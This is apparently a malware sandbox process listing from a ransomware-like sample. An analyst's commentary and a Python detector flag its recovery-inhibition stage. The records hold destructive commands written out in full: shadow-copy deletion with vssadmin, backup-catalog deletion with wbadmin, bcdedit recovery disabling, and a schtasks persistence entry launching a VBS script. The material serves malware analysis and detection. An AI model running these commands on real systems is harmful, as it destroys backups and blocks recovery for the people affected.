c:\program files\videolan\vlc\plugins\audio_filter\libdolby_surround_decoder_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libugly_resampler_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libtrivial_channel_mixer_plugin.dll
c:\program files\videolan\vlc\plugins\audio_filter\libaudio_format_plugin.dll
c:\windows\system32\avrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\comctl32.dll

PID
2120
CMD
"C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 10 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path
C:\Windows\system32\schtasks.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
840
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2888
CMD
"C:\Windows\system32\cmd.exe" /c bcdedit /set vbwfatdjw recoveryenabled no
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1576
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete catalog -quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
1724
CMD
bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
3048
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete systemstatebackup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbadmin.exe

PID
2072
CMD
"C:\Windows\system32\cmd.exe" /c wbadmin delete backup
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2844
CMD
bcdedit /set vbwfatdjw recoveryenabled no
Path
C:\Windows\system32\bcdedit.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Boot Configuration Data Editor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\bcdedit.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

PID
2180
CMD
wbadmin delete catalog -quiet
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967294
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

PID
2716
CMD
"C:\Windows\system32\cmd.exe" /c vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\vssadmin.exe

PID
2768
CMD
wbadmin delete systemstatebackup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967293
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\cryptbase.dll

PID
1980
CMD
wbadmin delete backup
Path
C:\Windows\system32\wbadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
4294967295
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® BLB Backup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\slc.dll
c:\windows\system32\credui.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll

PID
2404
CMD
vssadmin delete shadows /all /quiet
Path
C:\Windows\system32\vssadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
2
Version:
Company
Microsoft Corporation
Description
Command Line Interface for Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll

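The six records above (PIDs 1724, 2844, 2180, 2768, 1980 and 2404, each run through a cmd.exe /c wrapper spawned by powershell.exe) are the sample's recovery-inhibition stage (ATT&CK T1490): shadow copies, the Windows Backup catalog and backups, and the boot-time recovery environment are all hit in one pass. Two details in the fields matter for triage. All six ran at MEDIUM integrity and returned non-zero (bcdedit 1, vssadmin 2, and for wbadmin the unsigned renderings of -2, -3 and -1), so in this run nothing was actually deleted; the two bcdedit lines would fail even when elevated, because vbwfatdjw is neither a well-known entry identifier such as {default} nor a GUID. Further down, mmc.exe (PID 596) exits with 3221226540, which is 0xC000042C, STATUS_ELEVATION_REQUIRED, and the HIGH-integrity relaunch (PID 2360) with no recorded parent is what an accepted elevation prompt looks like in this kind of listing. The script below is an added example, written for this page rather than taken from ANY.RUN, that classifies records of this kind and makes the exit codes readable; the record values are transcribed from the entries above, while the field names and the two-category threshold are my own.

```python
"""Flag recovery-inhibition commands in a sandbox process list and read their exit codes.

Added example for this report; it is not ANY.RUN code. The records in REPORT are
transcribed from the process entries on the page; the field names and the
classification are my own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    parent: str               # parent image as the report shows it ("--" = not recorded)
    cmd: str
    integrity: str            # MEDIUM / HIGH / SYSTEM
    exit_code: Optional[int]  # None = still running when the task ended


# One pattern per recovery mechanism (MITRE ATT&CK T1490, Inhibit System Recovery).
RECOVERY_TAMPER = {
    "shadow_copies":  re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I),
    "backup_catalog": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+(?:catalog|backup|systemstatebackup)\b", re.I),
    "boot_recovery":  re.compile(r"\bbcdedit(?:\.exe)?\s+/set\b.*?\b(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I),
}


def classify(cmd: str) -> List[str]:
    """Names of the tamper categories a command line matches (normally zero or one)."""
    return [name for name, rx in RECOVERY_TAMPER.items() if rx.search(cmd)]


def describe_exit(code: Optional[int]) -> str:
    """Sandboxes print exit codes as unsigned 32-bit values; turn them into something readable."""
    if code is None:
        return "still running at end of task"
    if code == 0:
        return "0 (success)"
    if code >> 28 == 0xC:           # NTSTATUS error: the loader refused to start the image
        names = {0xC000042C: "STATUS_ELEVATION_REQUIRED"}
        return f"0x{code:08X} ({names.get(code, 'NTSTATUS error')})"
    signed = code - (1 << 32) if code >= (1 << 31) else code   # wbadmin returns -1/-2/-3
    return f"{signed} (failure)"


def triage(procs: List[Proc]) -> Tuple[str, List[Tuple[int, str, str]]]:
    """Return (verdict, hits); each hit is (pid, category, outcome).

    vssadmin, wbadmin and bcdedit all need administrative rights to change anything,
    so a command only counts as 'succeeded' when it exited 0 from an elevated process.
    """
    hits = []
    for p in procs:
        for category in classify(p.cmd):
            elevated = p.integrity.upper() in ("HIGH", "SYSTEM")
            if p.exit_code == 0 and elevated:
                outcome = "succeeded"
            elif p.exit_code is None:
                outcome = "unknown, " + describe_exit(None)
            else:
                outcome = "attempted, exit " + describe_exit(p.exit_code)
                if not elevated:
                    outcome += f", ran at {p.integrity}"
            hits.append((p.pid, category, outcome))
    # A lone vssadmin call can be an administrator's housekeeping; two or more
    # mechanisms hit in one run is the ransomware pattern.
    verdict = "inhibit-system-recovery" if len({c for _, c, _ in hits}) >= 2 else "no verdict"
    return verdict, hits


# Transcribed from the records on the page. The cmd.exe /c wrappers are left out:
# each child carries the same command line and is the process that actually ran.
REPORT = [
    Proc(1724, "cmd.exe", "bcdedit /set vbwfatdjw bootstatuspolicy ignoreallfailures", "MEDIUM", 1),
    Proc(2844, "cmd.exe", "bcdedit /set vbwfatdjw recoveryenabled no", "MEDIUM", 1),
    Proc(2180, "cmd.exe", "wbadmin delete catalog -quiet", "MEDIUM", 4294967294),
    Proc(2768, "cmd.exe", "wbadmin delete systemstatebackup", "MEDIUM", 4294967293),
    Proc(1980, "cmd.exe", "wbadmin delete backup", "MEDIUM", 4294967295),
    Proc(2404, "cmd.exe", "vssadmin delete shadows /all /quiet", "MEDIUM", 2),
    Proc(1972, "--", "SndVol.exe -f 46138548 29801", "MEDIUM", 0),
    Proc(596, "--", r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s', "MEDIUM", 3221226540),
    Proc(2360, "--", r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s', "HIGH", None),
]

if __name__ == "__main__":
    verdict, hits = triage(REPORT)
    print("verdict:", verdict)
    for pid, category, outcome in hits:
        print(f"  pid {pid:<5} {category:<15} {outcome}")
    print("mmc (pid 596):", describe_exit(3221226540))
```

Run as a script it prints the verdict and one line per flagged PID. When feeding it a live EDR export instead, keep the cmd.exe wrappers in: they double the hit count but preserve the powershell.exe to cmd.exe to wbadmin.exe chain that this report shows.
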
PID
1972
CMD
SndVol.exe -f 46138548 29801
Path
C:\Windows\system32\SndVol.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Volume Mixer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\sndvol.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shell32.dll
c:\windows\winsxs\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_145eb2808b8d6928\gdiplus.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\propsys.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\audioses.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll

PID
1952
CMD
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\Desktop\READ_ME_NOW.htm
Path
C:\Program Files\Internet Explorer\iexplore.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\system32\version.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757\comctl32.dll
c:\program files\internet explorer\ieshims.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\program files\internet explorer\sqmapi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\ieui.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\sxs.dll
c:\windows\system32\macromed\flash\flash64_27_0_0_187.ocx
c:\windows\system32\url.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\gpapi.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\msvcr90.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\dxgi.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\nlaapi.dll

PID
2944
CMD
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1952 CREDAT:144385 /prefetch:2
Path
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Indicators
Parent process
iexplore.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Internet Explorer
Version
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Image
c:\program files (x86)\internet explorer\iexplore.exe
c:\systemroot\system32\ntdll.dll
c:\systemroot\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\sechost.dll
c:\windows\syswow64\rpcrt4.dll
c:\windows\syswow64\sspicli.dll
c:\windows\syswow64\cryptbase.dll
c:\windows\syswow64\iertutil.dll
c:\windows\syswow64\api-ms-win-downlevel-version-l1-1-0.dll
c:\windows\syswow64\version.dll
c:\windows\syswow64\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\gdi32.dll
c:\windows\syswow64\lpk.dll
c:\windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0.dll
c:\windows\syswow64\usp10.dll
c:\windows\syswow64\normaliz.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\syswow64\shlwapi.dll
c:\windows\syswow64\imm32.dll
c:\windows\syswow64\msctf.dll
c:\windows\syswow64\api-ms-win-downlevel-shell32-l1-1-0.dll
c:\windows\syswow64\shell32.dll
c:\windows\syswow64\ieframe.dll
c:\windows\syswow64\ole32.dll
c:\windows\syswow64\oleaut32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
c:\program files (x86)\internet explorer\ieshims.dll
c:\windows\syswow64\comdlg32.dll
c:\windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\syswow64\wininet.dll
c:\windows\syswow64\userenv.dll
c:\windows\syswow64\profapi.dll
c:\windows\syswow64\secur32.dll
c:\windows\syswow64\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\syswow64\urlmon.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\nsi.dll
c:\windows\syswow64\winhttp.dll
c:\windows\syswow64\webio.dll
c:\windows\syswow64\mswsock.dll
c:\windows\syswow64\wship6.dll
c:\windows\syswow64\cryptsp.dll
c:\windows\syswow64\iphlpapi.dll
c:\windows\syswow64\winnsi.dll
c:\windows\syswow64\rsaenh.dll
c:\windows\syswow64\rpcrtremote.dll
c:\windows\syswow64\clbcatq.dll
c:\program files (x86)\internet explorer\ieproxy.dll
c:\windows\syswow64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\ieui.dll
c:\windows\syswow64\d2d1.dll
c:\windows\syswow64\dwrite.dll
c:\windows\syswow64\dxgi.dll
c:\windows\syswow64\dwmapi.dll
c:\program files (x86)\internet explorer\sqmapi.dll
c:\windows\syswow64\setupapi.dll
c:\windows\syswow64\cfgmgr32.dll
c:\windows\syswow64\devobj.dll
c:\windows\syswow64\wintrust.dll
c:\windows\syswow64\crypt32.dll
c:\windows\syswow64\msasn1.dll
c:\windows\syswow64\bcrypt.dll
c:\windows\syswow64\bcryptprimitives.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\uxtheme.dll
c:\windows\syswow64\jscript9.dll
c:\windows\syswow64\propsys.dll
c:\windows\syswow64\ntmarta.dll
c:\windows\syswow64\wldap32.dll
c:\windows\syswow64\msimtf.dll
c:\windows\syswow64\d3d11.dll
c:\windows\syswow64\d3d10warp.dll
c:\windows\syswow64\mlang.dll
c:\windows\syswow64\oleacc.dll
c:\windows\syswow64\sxs.dll
c:\windows\syswow64\dnsapi.dll
c:\windows\syswow64\wshtcpip.dll
c:\windows\syswow64\rasadhlp.dll
c:\windows\syswow64\fwpuclnt.dll
c:\windows\syswow64\wshqos.dll
c:\windows\syswow64\credssp.dll
c:\windows\syswow64\schannel.dll
c:\windows\syswow64\ncrypt.dll
c:\windows\syswow64\gpapi.dll

PID
596
CMD
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path
C:\Windows\system32\mmc.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
3221226540
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll

PID
2360
CMD
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path
C:\Windows\system32\mmc.exe
Indicators
Parent process
––
User
admin
Integrity Level
HIGH
Version:
Company
Microsoft Corporation
Description
Microsoft Management Console
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\cmd.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\conhost.exe
c:\windows\system32\mmc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
